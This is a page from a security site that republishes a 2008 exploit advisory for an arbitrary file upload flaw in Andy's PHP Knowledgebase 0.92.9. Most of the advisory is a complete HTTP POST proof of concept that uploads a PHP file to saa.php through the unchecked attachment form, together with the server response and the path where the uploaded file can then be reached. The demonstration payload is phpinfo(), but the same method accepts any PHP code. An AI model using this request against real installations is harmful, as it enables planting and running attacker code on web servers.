首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Andy's PHP Knowledgebase 0.92.9 Arbitrary File Upload Vulnerability
来源:cwh.citec.us 作者:CWH 发布时间:2008-12-02  
==============================================================
Andy's PHP Knowledgebase Arbitrary File Upload Vulnerability
==============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /          
  / XXXXXX /
(________(            
  `------'


AUTHOR : CWH Underground
DATE   : 1 December 2008
SITE   : cwh.citec.us


#####################################################
APPLICATION : Andy's PHP Knowledgebase
VERSION     : 0.92.9
DOWNLOAD    : http://sourceforge.net/project/showfiles.php?group_id=113755
#####################################################

--- Arbitrary File Upload ---

In saa.php page, you can submit an article and attachment file to wait for approval from admin.
Immediately after you submit the article and attachment file, the file has already been on the server without checking file type.
You can upload arbitary file through this form and the url to this file is in authors.php page.

--------
  POC
--------

POST /cms/aphpkb/saa.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://127.0.0.1/cms/aphpkb/saa.php?aid=2
Cookie: module=table; PHPSESSID=b311c4f9b1f3ee0c071f33ffd3b3176f
Content-Type: multipart/form-data; boundary=---------------------------22955284022147
Content-Length: 1080
-----------------------------22955284022147
Content-Disposition: form-data; name="title"

PoC Arbitrary File Upload
-----------------------------22955284022147
Content-Disposition: form-data; name="article"

PoC Arbitrary File Upload
-----------------------------22955284022147
Content-Disposition: form-data; name="keywords"

PoC Arbitrary File Upload
-----------------------------22955284022147
Content-Disposition: form-data; name="aid"

2
-----------------------------22955284022147
Content-Disposition: form-data; name="upload"; filename="info.php"
Content-Type: application/octet-stream

<? phpinfo(); ?>
-----------------------------22955284022147
Content-Disposition: form-data; name="description"

PHP File
-----------------------------22955284022147
Content-Disposition: form-data; name="aid"

2
-----------------------------22955284022147
Content-Disposition: form-data; name="a"


-----------------------------22955284022147
Content-Disposition: form-data; name="submit"

Submit/Save
-----------------------------22955284022147--


HTTP/1.x 200 OK
Date: Mon, 01 Dec 2008 05:39:35 GMT
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4578
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


-----------------------------------------------------------------------

Link for uploaded file is in http://[Target]/[aphpkb_path]/authors.php


#######################################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Cain & Abel <= v4.9.24 .RDP St
·Debian GNU/Linux (symlink atta
·Maxum Rumpus 6.0 Multiple Remo
·cpCommerce 1.2.6 (URL Rewrite)
·bcoos 1.0.13 (viewcat.php cid)
·Electronics Workbench (EWB Fil
·Minimal Ablog 0.4 (SQL/FU/Bypa
·KTP Computer Customer Database
·KTP Computer Customer Database
·CMS MAXSITE Component Guestboo
·Quick Tree View .NET 3.1 (qtv.
·serv-u7 local exp (php)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved